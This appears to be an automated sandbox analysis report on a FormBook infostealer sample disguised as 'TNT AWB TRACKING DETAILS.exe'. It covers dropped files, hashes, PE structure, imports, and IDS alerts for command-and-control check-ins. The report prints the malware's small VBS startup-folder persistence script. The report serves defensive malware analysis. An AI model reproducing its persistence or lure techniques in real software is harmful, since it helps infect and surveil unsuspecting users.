SHA-512:	542867CE339EF6BDAA73EAD94B023A6865842ADBBFE068E4B064B4FF5206E720D1A4060318E0AF30E9D883908749BB15E8E980421205203AE0239632ABF179A9
Malicious:	false
Preview:	EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.\|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

C:\Users\user\AppData\Local\Temp\gunfights

Download File

Process:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type:	ASCII text, with very long lines (29698), with no line terminators
Category:	dropped
Size (bytes):	29698
Entropy (8bit):	3.541434522381877
Encrypted:	false
SSDEEP:	384:cdhx4G/mran35nNquPWQSb4bNfEdvT/gcvI2c34861RvVItdps8MOoF1aFNjP1H:ZG/Ya35bAQsdvzgcAkVItdphKF8/1H
MD5:	90BE58915AFE0E8282D3B5D09B5854C7
SHA1:	F19A0CF9AFF77A070AB1C4C77328491FD304531F
SHA-256:	A52DB0D7417E9DF6B30E8D07656C9ADACF49D17DD26B335EEF53B0D21B4BC597
SHA-512:	30C3AFB1EF01D97D084F9788339A8DA2DC22306EF0F8B250D5E2EE8EF6627F0AD5E442A302F2790B295C284B9856708B8212C19017404D4026813A5F41392D79
Malicious:	false
Preview:	00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cc5e8c30ef480000f4c0ef48f4807c800089ff65f482700008b80e8e85ccccccccc00c555af124812781278555ccccccccccc00cf74408025802480258cccccccccc00c5e8dff48fff5ef480c8f48f48d430ecf48d48c3f521fc1ecf58c3d421fc1ecf48c3d521fc1ecf58c3d421fc1ecf48c3e521fc1ecf58c3e421fc1ecf48c3e521fc1ecf58e421fc1ecf48f48f43f480009800f78f581b0f40048fffff4c0000f4ce48edf430ecf48e58f530ecf58e480ecf48e480ecf48d580ecf58d480ecf48d48edf48eb82f4c3e8e85cccccc00c5e8c3be0e800048e5850b0e48f58170430002e5e48e48800048e58f4837143f48f58f480c8f480e0000f4ce48240048f58e48140048f48e

C:\Users\user\AppData\Local\Temp\overroughly

Download File

Process:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995659195193332
Encrypted:	true
SSDEEP:	6144:8p6w1tgASKv0fX6z1EUB/97coLB5ODvZ7j/x/UJBWljLKUe:88NAxQX6z1xB6govZ7jsBMjLKD
MD5:	00F7B01045CC6E87A4FF61FBFA36024B
SHA1:	D356E8923E21AEAF1D9AA46CCB2A9CD19063F0BA
SHA-256:	21A04C493F8CC2435BAC0A98F674F5E7D254736CA270EB14CC2FF872C9135D66
SHA-512:	B15C14FE4EBF2733438DF8247EFAF89AF592798687ECA83D845CB80CA1D465A5E4D2EF9C7D28EAC2AAC8B2CC304D6EBE68E57680BF9A0E47EA29C506C6E0DBCD
Malicious:	false
Preview:	.m...8GAX...^.....AW..gSB...XM48GAXE83WZLCS2CAT9SEOPJDA7XM.8GAVZ.=W.E.r.B....-&#j43X??UUg"9+V\#z.&s@6/tP=e...d,X<(.5JK\|E83WZLC3J.iY4.r0-.\|W?....b%_.M..oR$.N...s0-..^;%.X .XE83WZLC.wCA.8RE....A7XM48GA.E:2\[GCS`GAT9SEOPJD.#XM4(GAX5<3WZ.CS"CAT;SEIPJDA7XM28GAXE83WHCS0CAT9SEMP..A7HM4(GAXE(3WJLCS2CAD9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83y.);'2CA.iWEO@JDAe\M4(GAXE83WZLCS2CAt9S%OPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CA

C:\Users\user\AppData\Local\Temp\w2-0G0-7

Download File

Process:	C:\Windows\SysWOW64\mobsync.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

Download File

Process:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1169920
Entropy (8bit):	7.148387783799664
Encrypted:	false
SSDEEP:	24576:xu6J33O0c+JY5UZ+XC0kGso6FaA6N6wNLbUgy8/HlzFwWY:ju0c++OCvkGs9FaA+9Xy8PlztY
MD5:	BC31759CEAC4E0F680E1D6462953979B
SHA1:	4F31FA901BBCB19AA891B870A6920746FA9C59DA
SHA-256:	CA8A10690ABABB663B41F399DA42E43AD77FC59310862B369E4E38E9DF00F0E0
SHA-512:	EB3982F2EA15E00D9E1A08771B23B1A7426A7D60B946433DDF6191B444AE1121ECC54D1418BC051A7F3E9ABA8C031625F85FDD7AA80BDF8F99CEEF53E18B371C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....._g.........."..................}............@..........................P......&!....@...@.......@.....................L...\|....p..<Q.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<Q...p...R..................@..@.reloc...q.......r...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Download File

Process:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.3784972597051195
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclzXUEZ+lX1KZyynriIM8lfQVn:DsO+vNlDQ1KXmA2n
MD5:	5936A518D2C8F5581F03EBAED71EC707
SHA1:	C11B74CFF08AB44AE294975F6E072C7B75C7E072
SHA-256:	4F8F50193602C13A2CA1DA2BACADABC8BD9B8617477606E3CB1985ED2C19A35A
SHA-512:	CA3D347A0CAF14CE3284310CA8452B6A2566243E0CC94CDB833F7F105758303CCEAF75FB7E34FDE4BA2758F416A6632D32A1C82D1F118F33EADDF2877FDE02B1
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.h.u.r.t.l.i.n.g.\.j.a.i.l.k.e.e.p.e.r...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.148387783799664
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TNT AWB TRACKING DETAILS.exe
File size:	1'169'920 bytes
MD5:	bc31759ceac4e0f680e1d6462953979b
SHA1:	4f31fa901bbcb19aa891b870a6920746fa9c59da
SHA256:	ca8a10690ababb663b41f399da42e43ad77fc59310862b369e4e38e9df00f0e0
SHA512:	eb3982f2ea15e00d9e1a08771b23b1a7426a7d60b946433ddf6191b444ae1121ecc54d1418bc051a7f3e9aba8c031625f85fdd7aa80bdf8f99ceef53e18b371c
SSDEEP:	24576:xu6J33O0c+JY5UZ+XC0kGso6FaA6N6wNLbUgy8/HlzFwWY:ju0c++OCvkGs9FaA+9Xy8PlztY
TLSH:	9B45BF2273DDC360CB669173BF69B7016EBF7C614A30B85B2F980D7DA950162162C7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F8190 [Mon Dec 16 01:25:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F67A4F397FAh
jmp 00007F67A4F2C5C4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F67A4F2C74Ah
cmp edi, eax
jc 00007F67A4F2CAAEh
bt dword ptr [004C31FCh], 01h
jnc 00007F67A4F2C749h
rep movsb
jmp 00007F67A4F2CA5Ch
cmp ecx, 00000080h
jc 00007F67A4F2C914h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F67A4F2C750h
bt dword ptr [004BE324h], 01h
jc 00007F67A4F2CC20h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F67A4F2C8EDh
test edi, 00000003h
jne 00007F67A4F2C8FEh
test esi, 00000003h
jne 00007F67A4F2C8DDh
bt edi, 02h
jnc 00007F67A4F2C74Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F67A4F2C753h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F67A4F2C7A5h
bt esi, 03h
jnc 00007F67A4F2C7F8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5513c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11d000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5513c	0x55200	45e3d87e81518b8740d2cbc5833232cd	False	0.9228988849118943	data	7.882926251290652	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11d000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4c402	data			1.0003393933184341
RT_GROUP_ICON	0x11bbbc	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11bc34	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11bc48	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11bc5c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11bc70	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11bd4c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T08:38:35.829132+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49900	3.33.130.190	80	TCP
2024-12-16T08:38:52.725837+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49940	3.33.130.190	80	TCP
2024-12-16T08:38:55.387772+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49947	3.33.130.190	80	TCP
2024-12-16T08:38:58.241023+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49952	3.33.130.190	80	TCP
